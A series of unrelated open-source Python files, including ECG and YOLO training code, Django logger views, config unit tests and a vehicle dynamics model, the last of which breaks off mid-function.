:param tuple input_shape: the input shape that the data must have to be used as training data.
:param list data_y: the labels related to the data used to train.
:param int number_of_classes: number of classes of the problem.
:param bool normalize: if the data should be normalized (True) or not (False).
:return np.array: the data processed.
"""
if len(input_shape) == 2:
data_x = np.asarray(data_x).reshape(-1, input_shape[0], input_shape[1]) # Reshape for CNN - should work!!
elif len(input_shape) == 3:
data_x = np.asarray(data_x).reshape(-1, input_shape[0], input_shape[1], input_shape[2]) # Reshape for CNN - should work!!
else:
raise Exception('Only inputs of two and three dimensions were implemented.')
if normalize:
data_x = data_x / np.amax(data_x)
data_y = keras.utils.to_categorical(data_y).reshape(-1, number_of_classes)
return data_x, data_y
@classmethod
def train(cls, model, train_x, train_y, validation_x, validation_y, number_of_classes, input_shape=(300, 1),
epochs=10, lr=1e-4, batch_size=4, optimizer=None, loss=None, metrics=None, normalize=False, show_net_info=True):
"""
Function used to train the model.
:param keras.Sequential model: model to be trained.
:param list train_x: data that will be used to train.
:param list train_y: the labels related to the data used to train.
:param list validation_x: data that will be used to validate the model trained.
:param list validation_y: the labels related to the data used to validate the model trained.
:param int number_of_classes: number of classes of the problem.
:param tuple input_shape: the input shape that the data must have to be used as training data.
:param int epochs: total epochs that the model will be trained.
:param float lr: learning rate used to train.
:param int batch_size: batch size used to train.
:param optimizer: which optimizer will be used to train.
:param str loss: loss function used during the training.
:param list metrics: metrics used to evaluate the trained model.
:param bool normalize: if the data should be normalized (True) or not (False).
:param bool show_net_info: if the network topology should be showed (True) or not (False).
:return keras.Sequential, dict: model trained and the history of the training process.
"""
if optimizer is None:
optimizer = keras.optimizers.SGD(lr=lr, momentum=0.9, decay=1e-4/epochs)
if loss is None:
loss = keras.losses.categorical_crossentropy
if metrics is None:
metrics = ['acc']
elif type(metrics) is not list:
metrics = [metrics]
# Set optimizer
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
if show_net_info:
print(model.summary())
# Prepare data
train_x, train_y = cls._prepare_data(train_x, input_shape, train_y, number_of_classes, normalize)
validation_x, validation_y = cls._prepare_data(validation_x, input_shape, validation_y, number_of_classes, normalize)
kback.set_value(model.optimizer.lr, lr)
train_history = model.fit(x=train_x, y=train_y, validation_data=(validation_x, validation_y), batch_size=batch_size, epochs=epochs)
# H = model.fit(x=train_x, y=train_y, batch_size=batch_size, epochs=epochs)
return model, train_history
@classmethod
def save_model(cls, model, model_name):
try:
model.save(model_name)
except OSError:
# serialize model to JSON
model_json = model.to_json()
with open(model_name.replace('.h5', '.json'), 'w') as json_file:
json_file.write(model_json)
# serialize weights to HDF5
model.save_weights(model_name)
@classmethod
def load_model(cls, model_name):
if os.path.exists(model_name.replace('.h5', '.json')):
# load json and create model
json_file = open(model_name.replace('.h5', '.json'), 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = keras.models.model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights(model_name)
return loaded_model
else:
return keras.models.load_model(model_name)
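# Minimal usage sketch (illustrative only): builds the CNN and runs one epoch on random
# arrays shaped like the 300-sample, single-channel windows the net expects; real ECG
# segments and labels would replace the dummy data.
if __name__ == '__main__':
    dummy_x = [np.random.rand(300, 1) for _ in range(8)]
    dummy_y = [0, 1] * 4
    model = QRSNet.build('cnn')
    model, history = QRSNet.train(model, dummy_x[:6], dummy_y[:6], dummy_x[6:], dummy_y[6:],
                                  number_of_classes=2, epochs=1, batch_size=2,
                                  show_net_info=False)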
# === ufopcsilab/ECGClassification :: python/qrs/qrs_net.py (MIT, Python, 7,297 bytes) ===
"""
MIT License
Copyright (c) 2019 YangYun
Copyright (c) 2020 Việt Hùng
Copyright (c) 2020-2021 Hyeonki Hong <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from typing import List
import cv2
import numpy as np
from tensorflow.keras.utils import Sequence
from .augmentation import mosaic
from ...common import (
media,
convert_dataset_to_ground_truth as _convert_dataset_to_ground_truth,
)
from ...common.config import YOLOConfig
from ...common.parser import parse_dataset
_AUGMETATION_CACHE_SIZE = 50
class YOLODataset(Sequence):
def __init__(
self,
config: YOLOConfig,
dataset_list: str,
dataset_type: str = "converted_coco",
image_path_prefix: str = "",
training: bool = True,
):
self.dataset = parse_dataset(
dataset_list=dataset_list,
dataset_type=dataset_type,
image_path_prefix=image_path_prefix,
)
self._metayolos = []
if config.layer_count["yolo"] > 0:
for i in range(config.layer_count["yolo"]):
self._metayolos.append(config.find_metalayer("yolo", i))
elif config.layer_count["yolo_tpu"] > 0:
for i in range(config.layer_count["yolo_tpu"]):
self._metayolos.append(config.find_metalayer("yolo_tpu", i))
else:
raise RuntimeError(
"YOLODataset: model does not have a yolo or yolo_tpu layer"
)
self._metanet = config.net
self._metayolos_np = np.zeros(
(len(self._metayolos), 7 + len(self._metayolos[-1].mask)),
dtype=np.float32,
)
for i, metayolo in enumerate(self._metayolos):
self._metayolos_np[i, 0] = metayolo.height
self._metayolos_np[i, 1] = metayolo.width
self._metayolos_np[i, 2] = metayolo.channels
self._metayolos_np[i, 3] = metayolo.classes
self._metayolos_np[i, 4] = metayolo.label_smooth_eps
self._metayolos_np[i, 5] = metayolo.max
self._metayolos_np[i, 6] = metayolo.iou_thresh
for j, mask in enumerate(metayolo.mask):
self._metayolos_np[i, 7 + j] = mask
self._anchors_np = np.zeros(
len(self._metayolos[-1].anchors) * 2, dtype=np.float32
)
for i, anchor in enumerate(self._metayolos[-1].anchors):
self._anchors_np[2 * i] = anchor[0] / self._metanet.width
self._anchors_np[2 * i + 1] = anchor[1] / self._metanet.height
# Data augmentation ####################################################
self._augmentation: List[str] = []
if config.net.mosaic:
self._augmentation.append("mosaic")
if training and len(self._augmentation) > 0:
self._augmentation_batch = int(config.net.batch * 0.3)
self._training = True
else:
self._augmentation_batch = 0
self._training = False
self._augmentation_cache = [
self._get_dataset(i) for i in range(_AUGMETATION_CACHE_SIZE)
]
self._augmentation_cache_index = 0
def _convert_dataset_to_ground_truth(self, dataset_bboxes):
"""
@param `dataset_bboxes`: [[b_x, b_y, b_w, b_h, class_id], ...]
@return `groud_truth_one`:
[Dim(yolo.h, yolo.w, yolo.c + len(mask))] * len(yolo)
"""
return _convert_dataset_to_ground_truth(
dataset_bboxes, self._metayolos_np, self._anchors_np
)
def _convert_dataset_to_image_and_bboxes(self, dataset):
"""
@param dataset: [image_path, [[x, y, w, h, class_id], ...]]
@return image, bboxes
image: 0.0 ~ 1.0, Dim(1, height, width, channels)
"""
# pylint: disable=bare-except
try:
image = cv2.imread(dataset[0])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
except:
return None, None
resized_image, resized_bboxes = media.resize_image(
image,
target_shape=self._metanet.input_shape,
ground_truth=dataset[1],
)
resized_image = np.expand_dims(resized_image / 255.0, axis=0)
return resized_image, resized_bboxes
def _get_dataset(self, index: int):
        # try up to five consecutive entries until a readable image is found
        for offset in range(5):
            image, bboxes = self._convert_dataset_to_image_and_bboxes(
                self.dataset[(index + offset) % len(self.dataset)]
            )
            if image is not None:
                return image, bboxes
raise FileNotFoundError("Failed to find images")
def __getitem__(self, index):
"""
@return
`images`: Dim(batch, height, width, channels)
`groud_truth_one`:
[Dim(batch, yolo.h, yolo.w, yolo.c + len(mask))] * len(yolo)
"""
batch_x = []
# [[gt_one, gt_one, ...],
# [gt_one, gt_one, ...], ...]
batch_y = [[] for _ in range(len(self._metayolos))]
start_index = index * self._metanet.batch
for i in range(self._metanet.batch - self._augmentation_batch):
image, bboxes = self._get_dataset(start_index + i)
self._augmentation_cache[self._augmentation_cache_index] = (
image,
bboxes,
)
self._augmentation_cache_index = (
self._augmentation_cache_index + 1
) % _AUGMETATION_CACHE_SIZE
batch_x.append(image)
ground_truth = self._convert_dataset_to_ground_truth(bboxes)
for j in range(len(self._metayolos)):
batch_y[j].append(ground_truth[j])
for i in range(self._augmentation_batch):
augmentation = self._augmentation[
np.random.randint(0, len(self._augmentation))
]
image = None
bboxes = None
if augmentation == "mosaic":
image, bboxes = mosaic(
*[
self._augmentation_cache[
np.random.randint(
0,
_AUGMETATION_CACHE_SIZE,
)
]
for _ in range(4)
]
)
batch_x.append(image)
ground_truth = self._convert_dataset_to_ground_truth(bboxes)
for j in range(len(self._metayolos)):
batch_y[j].append(ground_truth[j])
return np.concatenate(batch_x, axis=0), [
np.stack(y, axis=0) for y in batch_y
]
def __len__(self):
return len(self.dataset) // (
self._metanet.batch - self._augmentation_batch
)
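# Minimal usage sketch (illustrative only): given an already-parsed YOLOConfig instance
# `config` and an annotation list file, the Sequence yields one batch of images plus the
# per-YOLO-layer ground truth, ready to be passed to tf.keras Model.fit():
#
#   train_data = YOLODataset(config, "train.txt", dataset_type="converted_coco",
#                            image_path_prefix="images", training=True)
#   images, ground_truths = train_data[0]
#   # images: (batch, net.height, net.width, channels); ground_truths: one array per yolo layer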
# === fcakyon/tensorflow-yolov4 :: py_src/yolov4/tf/dataset/keras_sequence.py (MIT, Python, 7,849 bytes) ===
from amaru.utilities import constants
def generate_subsets(current_tree_bottom):
current_distances = []
subsets = []
current_point = 0
while current_point < len(current_tree_bottom) - 1:
current_distances.append(current_tree_bottom[current_point + 1][1] - current_tree_bottom[current_point][1])
current_point = current_point + 1
    # remove similar splits caused by floating point imprecision
for i in range(len(current_distances)):
current_distances[i] = round(current_distances[i], 10)
split_points = list(set(current_distances)) # all possible x-distances between bottom blocks
for i in split_points: # subsets based on differences between x-distances
current_subset = []
start_point = 0
end_point = 1
for j in current_distances:
if j >= i:
current_subset.append(current_tree_bottom[start_point:end_point])
start_point = end_point
end_point = end_point + 1
current_subset.append(current_tree_bottom[start_point:end_point])
subsets.append(current_subset)
subsets.append([current_tree_bottom])
return subsets
# finds the center positions of the given subset
def find_subset_center(subset):
if len(subset) % 2 == 1:
return subset[(len(subset) - 1) // 2][1]
else:
return (subset[len(subset) // 2][1] - subset[(len(subset) // 2) - 1][1]) / 2.0 + subset[(len(subset) // 2) - 1][
1]
# finds the edge positions of the given subset
def find_subset_edges(subset):
edge1 = subset[0][1] - (constants.blocks[str(subset[0][0])][0]) / 2.0 + constants.edge_buffer
edge2 = subset[-1][1] + (constants.blocks[str(subset[-1][0])][0]) / 2.0 - constants.edge_buffer
return [edge1, edge2]
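# Worked example (illustrative only): four bottom blocks whose x-gaps are 1.0, 2.0 and 1.0
# produce three candidate groupings -- split at every gap, split only at the large gap, or
# keep everything in one subset.
if __name__ == "__main__":
    bottom = [('2', 0.0), ('2', 1.0), ('2', 3.0), ('2', 4.0)]
    for subset in generate_subsets(bottom):
        print(subset, [find_subset_center(s) for s in subset])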
# === TeamSerpentine/angry-birds-level-gen-2020 :: amaru/utilities/subsets.py (BSD-3-Clause, Python, 1,800 bytes) ===
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from Logger.models import Run, Process
from Logger.libs import log_dealer
import json
# Create your views here.
def listen(request):
log_dealer(request)
context_dict = {}
response = render(request, 'index.html', context=context_dict)
return response
def show_run(request, runId):
context_dict = {}
try:
run = Run.objects.get(runId=runId)
procs = Process.objects.filter(runId=runId)
context_dict['processes'] = procs
context_dict['run'] = run
except Run.DoesNotExist:
context_dict['processes'] = None
context_dict['run'] = None
return render(request, 'run.html', context_dict)
def show_process(request, runId, h1, h2):
context_dict = {}
try:
uid = '/'.join([runId, h1, h2])
proc = Process.objects.get(uid=uid)
context_dict['process'] = proc
context_dict['script_lines'] = proc.script.split('\n')
    except Process.DoesNotExist:
context_dict['process'] = None
return render(request, 'process.html', context_dict)
def index(request):
started_list = Run.objects.filter(runStatus='started').order_by('-startedDatetime')[:10]
success_list = Run.objects.filter(runStatus='success').order_by('-startedDatetime')[:10]
failed_list = Run.objects.filter(runStatus='failed').order_by('-startedDatetime')[:10]
context_dict = {'started':started_list, 'success':success_list, 'failed':failed_list}
return render(request, 'index.html', context_dict)
def search(request):
query = request.GET['q']
if '/' in query:
return HttpResponseRedirect("/")
else:
return HttpResponseRedirect(f"/run/{query}")
def about(request):
context_dict = {}
return render(request, 'about.html', context_dict)
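# Hypothetical URLconf sketch (illustrative only; the real routes live in the project's
# urls.py): show_run expects the runId, show_process the runId plus the two hash segments
# of the Nextflow process uid.
#
#   from django.urls import path
#   from Logger import views
#
#   urlpatterns = [
#       path('', views.index, name='index'),
#       path('listen/', views.listen, name='listen'),
#       path('run/<runId>/', views.show_run, name='show_run'),
#       path('run/<runId>/<h1>/<h2>/', views.show_process, name='show_process'),
#       path('search/', views.search, name='search'),
#       path('about/', views.about, name='about'),
#   ]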
# === MenheraMikumo/Nextflow-Kanban :: Logger/views.py (MIT, Python, 1,868 bytes) ===
# MIT License
# Copyright (c) 2020 Simon Schug, João Sacramento
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
import time
from importlib import reload
import torch
# Global variables
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
log_dir = None
log_name = None
writer = None
def setup_logging(name, dir=""):
"""
Setup the logging device to log into a uniquely created directory.
Args:
name: Name of the directory for the log-files.
dir: Optional sub-directory within log
"""
# Setup global log name and directory
global log_name
log_name = name
# Setup global logging directory
global log_dir
log_dir = os.path.join("log", dir)
# Create the logging folder if it does not exist already
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
# Need to reload logging as otherwise the logger might be captured by another library
reload(logging)
# Setup global logger
logging.basicConfig(
level=logging.INFO,
format="[%(levelname)-5.5s %(asctime)s] %(message)s",
datefmt='%H:%M:%S',
handlers=[
logging.FileHandler(os.path.join(
log_dir, time.strftime("%Y%m%d_%H%M") + "_" + name + ".log")
),
logging.StreamHandler()
])
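# Minimal usage sketch (illustrative only; the module path `lib.config` is assumed from the
# repository layout): call setup_logging once at program start, then use the standard
# logging functions and the module-level `device` everywhere else.
#
#   import logging
#   import lib.config as config
#
#   config.setup_logging("mnist_run", dir="mnist")
#   logging.info("Using device: %s", config.device)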
# === SudeepSarkar/equilibrium-propagation :: lib/config.py (MIT, Python, 2,362 bytes) ===
'''
Created on Feb 4, 2021
@author: paepcke
'''
import io
import os
import pickle
import tempfile
import unittest
from experiment_manager.neural_net_config import NeuralNetConfig
#from experiment_manager.dottable_config import DottableConfigParser
TEST_ALL = True
#TEST_ALL = False
class NeuralNetConfigTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.curr_dir = os.path.dirname(__file__)
def setUp(self):
cfg_file = os.path.join(os.path.dirname(__file__),
'dottable_config_tst.cfg')
self.cfg_arr_file = os.path.join(os.path.dirname(__file__),
'neural_net_config_arrays_tst.cfg')
self.config = NeuralNetConfig(cfg_file)
complete_cfg_file = os.path.join(os.path.dirname(__file__),
'../../tests',
'bird_trainer_tst.cfg')
self.complete_config = NeuralNetConfig(complete_cfg_file)
def tearDown(self):
pass
# ------------ Tests -----------
#------------------------------------
# test_add_section
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_add_section(self):
self.config.add_section('FoodleDoodle')
secs = self.config.sections()
self.assertIn('FoodleDoodle', secs)
self.assertEqual(len(self.config.FoodleDoodle), 0)
self.assertEqual(len(self.config['FoodleDoodle']), 0)
self.config.FoodleDoodle = 10
self.assertEqual(self.config.FoodleDoodle, 10)
self.assertEqual(self.config['FoodleDoodle'], 10)
#------------------------------------
# test_setter_evals
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_setter_evals(self):
# A non-neural-net name:
self.config.foo = 10
self.assertEqual(self.config.foo, 10)
self.assertEqual(self.config['foo'], 10)
# A nn-special parameter:
self.config.batch_size = 128
self.assertEqual(self.config.Training.batch_size, 128)
self.assertEqual(self.config.Training['batch_size'], 128)
self.config.Training.optimizer = 'foo_opt'
self.assertEqual(self.config.Training.optimizer, 'foo_opt')
#------------------------------------
# test_setter_methods
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_setter_methods(self):
#****self.config.net_name = 'Foobar'
self.config.set_net_name('Foobar')
self.assertEqual(self.config.Training.net_name, 'Foobar')
# Wrong type for epoch:
with self.assertRaises(AssertionError):
self.config.set_min_epochs('foo')
# min_epoch > max_epoch:
self.config.set_max_epochs(10)
with self.assertRaises(AssertionError):
self.config.set_min_epochs('20')
self.config.set_batch_size(32)
self.assertEqual(self.config.Training.batch_size, 32)
with self.assertRaises(AssertionError):
self.config.set_batch_size(-20)
self.assertEqual(self.config.Training.batch_size, 32)
with self.assertRaises(AssertionError):
self.config.set_num_folds(-20)
with self.assertRaises(AssertionError):
self.config.set_all_procs_log(-20)
self.config.set_all_procs_log(True)
self.assertTrue(self.config.Parallelism.all_procs_log)
#------------------------------------
# test_eq
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_eq(self):
self.assertTrue(self.config == self.config)
# Copies of a NeuralNetConfig instance
# shouldn't be (content-wise) equal to
# the original:
conf_copy = self.config.copy()
self.assertTrue(conf_copy == self.config)
# But if we add a section to the copy
# (and not to the original)...:
conf_copy.add_section('TestSection')
# ... copy and original should no longer
# be equal:
self.assertTrue(conf_copy != self.config)
# Check that TestSection was indeed added
# to the copy, but not simultaneously to the
# original (via residually shared data structs):
self.assertEqual(sorted(conf_copy.sections()),
sorted(['Paths', 'Training', 'Parallelism', 'TestSection'])
)
self.assertEqual(sorted(self.config.sections()),
sorted(['Paths', 'Training', 'Parallelism'])
)
#------------------------------------
# test_to_json_xc_recording
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_to_json_xc_recording(self):
json_str = self.config.to_json()
expected = '{"Paths": {"my_path": "/foo/bar.txt", "roots": "[/foo/bar.txt, blue.jpg, 10, 3.14]", "toots": "/foo/bar.txt, blue.jpg, 10, 3.14"}, "Training": {"train_str": "resnet18", "train_int": "5", "train_float": "3.14159", "train_yes": "yes", "train_yescap": "Yes", "train_1": "1", "train_on": "On", "train_no": "no", "train_0": "0", "train_off": "off"}, "Parallelism": {}}'
self.assertEqual(json_str, expected)
str_stream = io.StringIO()
full_stream = self.config.to_json(str_stream)
expected = full_stream.getvalue()
self.assertEqual(json_str, expected)
# For writing to file, use a temp file
# that is destroyed when closed:
try:
tmp_file = tempfile.NamedTemporaryFile(dir=self.curr_dir,
suffix='.json',
delete=False
)
tmp_file.close()
with open(tmp_file.name, 'w') as fd:
fd.write('foobar')
with self.assertRaises(FileExistsError):
self.config.to_json(tmp_file.name)
finally:
tmp_file.close()
os.remove(tmp_file.name)
try:
tmp_file = tempfile.NamedTemporaryFile(dir=self.curr_dir,
suffix='.json',
delete=False
)
tmp_file.close()
self.config.to_json(tmp_file.name,
check_file_exists=False
)
finally:
tmp_file.close()
os.remove(tmp_file.name)
#------------------------------------
# test_from_json
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_from_json(self):
json_str = self.config.to_json()
new_inst = NeuralNetConfig.json_loads(json_str)
self.assertTrue(new_inst == self.config)
#------------------------------------
# test_json_human_readable
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_json_human_readable(self):
json_str = self.complete_config.to_json()
human_str = NeuralNetConfig.json_human_readable(json_str)
print(human_str)
#------------------------------------
# test_arrays
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_arrays(self):
config = NeuralNetConfig(self.cfg_arr_file)
arr1 = config.getarray('Training', 'arr1', 'foo')
expected = ['1', "'foo'", '[10', 'bluebell]']
self.assertListEqual(arr1, expected)
arr2 = config.getarray('Training', 'arr2', 'foo')
self.assertEqual(len(arr2),10)
expected = ['BANAG', 'BBFLG', 'BCMMG', 'BHPAG', 'BHTAG',
'BTSAC', 'BTSAS', 'CCROC', 'CCROS', 'CFPAG'
]
self.assertListEqual(arr2, expected)
#------------------------------------
# test_pickling
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_pickling(self):
config = NeuralNetConfig(self.cfg_arr_file)
new_config = pickle.loads(pickle.dumps(config))
self.assertEqual(config, new_config)
# -------------- Main -----------------
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
# === paepcke/ml_experiment_manager :: src/experiment_manager/tests/test_neural_net_config.py (BSD-3-Clause, Python, 8,859 bytes) ===
""" Dynamic bicycle model.
Use Dynamic class to:
1. simulate continuous model
2. linearize continuous model
3. discretize continuous model
4. simulate continuously linearized discrete model
5. compare continuous and discrete models
"""
__author__ = 'Achin Jain'
__email__ = '[email protected]'
import numpy as np
import casadi as cs
from bayes_race.models.model import Model
from bayes_race.params import F110
class Dynamic(Model):
def __init__(self, lf, lr, mass, Iz, Cf, Cr,
Bf=None, Br=None, Df=None, Dr=None,
Cm1=None, Cm2=None, Cr0=None, Cr2=None,
input_acc=False, **kwargs):
""" specify model params here
"""
self.lf = lf
self.lr = lr
self.dr = lr/(lf+lr)
self.mass = mass
self.Iz = Iz
self.Cf = Cf
self.Cr = Cr
self.Bf = Bf
self.Br = Br
self.Df = Df
self.Dr = Dr
self.Cm1 = Cm1
self.Cm2 = Cm2
self.Cr0 = Cr0
self.Cr2 = Cr2
self.approx = False
if Bf is None or Br is None or Df is None or Dr is None:
self.approx = True
self.input_acc = input_acc
self.n_states = 6
self.n_inputs = 2
Model.__init__(self)
def sim_continuous(self, x0, u, t):
""" simulates the nonlinear continuous model with given input vector
by numerical integration using 6th order Runge Kutta method
x0 is the initial state of size 6x1
u is the input vector of size 2xn
t is the time vector of size 1x(n+1)
"""
n_steps = u.shape[1]
x = np.zeros([6, n_steps+1])
dxdt = np.zeros([6, n_steps+1])
dxdt[:,0] = self._diffequation(None, x0, [0, 0])
x[:,0] = x0
for ids in range(1, n_steps+1):
x[:,ids] = self._integrate(x[:,ids-1], u[:,ids-1], t[ids-1], t[ids])
dxdt[:,ids] = self._diffequation(None, x[:,ids], u[:,ids-1])
return x, dxdt
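	# Usage sketch for sim_continuous (shapes assumed from the docstring above,
	# not taken from a captured run): for N inputs sampled every dt seconds,
	#   u = np.zeros((2, N))
	#   t = np.linspace(0.0, N*dt, N+1)
	#   x, dxdt = model.sim_continuous(x0, u, t)   # x and dxdt are 6 x (N+1)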
def _diffequation(self, t, x, u):
""" write dynamics as first order ODE: dxdt = f(x(t))
x is a 6x1 vector: [x, y, psi, vx, vy, omega]^T
u is a 2x1 vector: [acc/pwm, steer]^T
"""
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
Ffy, Frx, Fry = self.calc_forces(x, u)
dxdt = np.zeros(6)
dxdt[0] = vx*np.cos(psi) - vy*np.sin(psi)
dxdt[1] = vx*np.sin(psi) + vy*np.cos(psi)
dxdt[2] = omega
dxdt[3] = 1/self.mass * (Frx - Ffy*np.sin(steer)) + vy*omega
dxdt[4] = 1/self.mass * (Fry + Ffy*np.cos(steer)) - vx*omega
dxdt[5] = 1/self.Iz * (Ffy*self.lf*np.cos(steer) - Fry*self.lr)
return dxdt
def calc_forces(self, x, u, return_slip=False):
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
if self.approx:
# rolling friction and drag are ignored
acc = u[0]
Frx = self.mass*acc
# See Vehicle Dynamics and Control (Rajamani)
alphaf = steer - (self.lf*omega + vy)/vx
alphar = (self.lr*omega - vy)/vx
Ffy = 2 * self.Cf * alphaf
Fry = 2 * self.Cr * alphar
else:
if self.input_acc:
# rolling friction and drag are ignored
acc = u[0]
Frx = self.mass*acc
else:
# rolling friction and drag are modeled
pwm = u[0]
Frx = (self.Cm1-self.Cm2*vx)*pwm - self.Cr0 - self.Cr2*(vx**2)
alphaf = steer - np.arctan2((self.lf*omega + vy), abs(vx))
alphar = np.arctan2((self.lr*omega - vy), abs(vx))
Ffy = self.Df * np.sin(self.Cf * np.arctan(self.Bf * alphaf))
Fry = self.Dr * np.sin(self.Cr * np.arctan(self.Br * alphar))
if return_slip:
return Ffy, Frx, Fry, alphaf, alphar
else:
return Ffy, Frx, Fry
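	# Note: the Df*sin(Cf*arctan(Bf*alpha)) expressions above are the simplified
	# Pacejka "magic formula" for lateral tyre force, while the 2*C*alpha branch
	# is the linear small-slip approximation used when Bf/Br/Df/Dr are not given.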
def casadi(self, x, u, dxdt):
""" write dynamics as first order ODE: dxdt = f(x(t))
x is a 6x1 vector: [x, y, psi, vx, vy, omega]^T
u is a 2x1 vector: [acc/pwm, steer]^T
dxdt is a casadi.SX variable
"""
pwm = u[0]
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
vmin = 0.05
vy = cs.if_else(vx<vmin, 0, vy)
omega = cs.if_else(vx<vmin, 0, omega)
steer = cs.if_else(vx<vmin, 0, steer)
vx = cs.if_else(vx<vmin, vmin, vx)
Frx = (self.Cm1-self.Cm2*vx)*pwm - self.Cr0 - self.Cr2*(vx**2)
alphaf = steer - cs.atan2((self.lf*omega + vy), vx)
alphar = cs.atan2((self.lr*omega - vy), vx)
Ffy = self.Df * cs.sin(self.Cf * cs.arctan(self.Bf * alphaf))
Fry = self.Dr * cs.sin(self.Cr * cs.arctan(self.Br * alphar))
dxdt[0] = vx*cs.cos(psi) - vy*cs.sin(psi)
dxdt[1] = vx*cs.sin(psi) + vy*cs.cos(psi)
dxdt[2] = omega
dxdt[3] = 1/self.mass * (Frx - Ffy*cs.sin(steer)) + vy*omega
dxdt[4] = 1/self.mass * (Fry + Ffy*cs.cos(steer)) - vx*omega
dxdt[5] = 1/self.Iz * (Ffy*self.lf*cs.cos(steer) - Fry*self.lr)
return dxdt
def sim_discrete(self, x0, u, Ts):
""" simulates a continuously linearized discrete model
u is the input vector of size 2xn
Ts is the sampling time
"""
n_steps = u.shape[1]
x = np.zeros([6, n_steps+1])
dxdt = np.zeros([6, n_steps+1])
dxdt[:,0] = self._diffequation(None, x0, [0, 0])
x[:,0] = x0
for ids in range(1, n_steps+1):
g = self._diffequation(None, x[:,ids-1], u[:,ids-1]).reshape(-1,)
x[:,ids] = x[:,ids-1] + g*Ts
dxdt[:,ids] = self._diffequation(None, x[:,ids], u[:,ids-1])
return x, dxdt
def linearize(self, x0, u0):
""" linearize at a given x0, u0
for a given continuous system dxdt = f(x(t))
calculate A = ∂f/∂x, B = ∂f/∂u, g = f evaluated at x0, u0
A is 6x6, B is 6x2, g is 6x1
"""
steer = u0[1]
psi = x0[2]
vx = x0[3]
vy = x0[4]
omega = x0[5]
# numerical correction for low speeds
vmin = 0.05
if vx < vmin:
vy = 0
omega = 0
steer = 0
vx = vmin
sindelta = np.sin(steer)
cosdelta = np.cos(steer)
sinpsi = np.sin(psi)
cospsi = np.cos(psi)
Ffy, Frx, Fry, alphaf, alphar = self.calc_forces(x0, u0, return_slip=True)
if self.approx:
dFfy_dvx = 2 * self.Cf * (self.lf*omega + vy)/((self.lf*omega + vy)**2 + vx**2)
dFfy_dvy = -2 * self.Cf * vx/((self.lf*omega + vy)**2 + vx**2)
dFfy_domega = -2 * self.Cf * self.lf * vx/((self.lf*omega + vy)**2 + vx**2)
dFrx_dvx = 0
dFrx_dvu1 = 1
dFry_dvx = -2 * self.Cr * (self.lr*omega - vy)/((self.lr*omega - vy)**2 + vx**2)
dFry_dvy = -2 * self.Cr * vx/((self.lr*omega - vy)**2 + vx**2)
dFry_domega = 2 * self.Cr * self.lr * vx/((self.lr*omega - vy)**2 + vx**2)
dFfy_delta = 2*self.Cf
else:
dFfy_dalphaf = self.Bf * self.Cf * self.Df * np.cos(self.Cf * np.arctan(self.Bf * alphaf))
dFfy_dalphaf *= 1/(1+(self.Bf*alphaf)**2)
dFry_dalphar = self.Br * self.Cr * self.Dr * np.cos(self.Cr * np.arctan(self.Br * alphar))
dFry_dalphar *= 1/(1+(self.Br*alphar)**2)
dFfy_dvx = dFfy_dalphaf * (self.lf*omega + vy)/((self.lf*omega + vy)**2 + vx**2)
dFfy_dvy = -dFfy_dalphaf * vx/((self.lf*omega + vy)**2 + vx**2)
dFfy_domega = -dFfy_dalphaf * self.lf * vx/((self.lf*omega + vy)**2 + vx**2)
if self.input_acc:
raise NotImplementedError
pwm = u0[0]
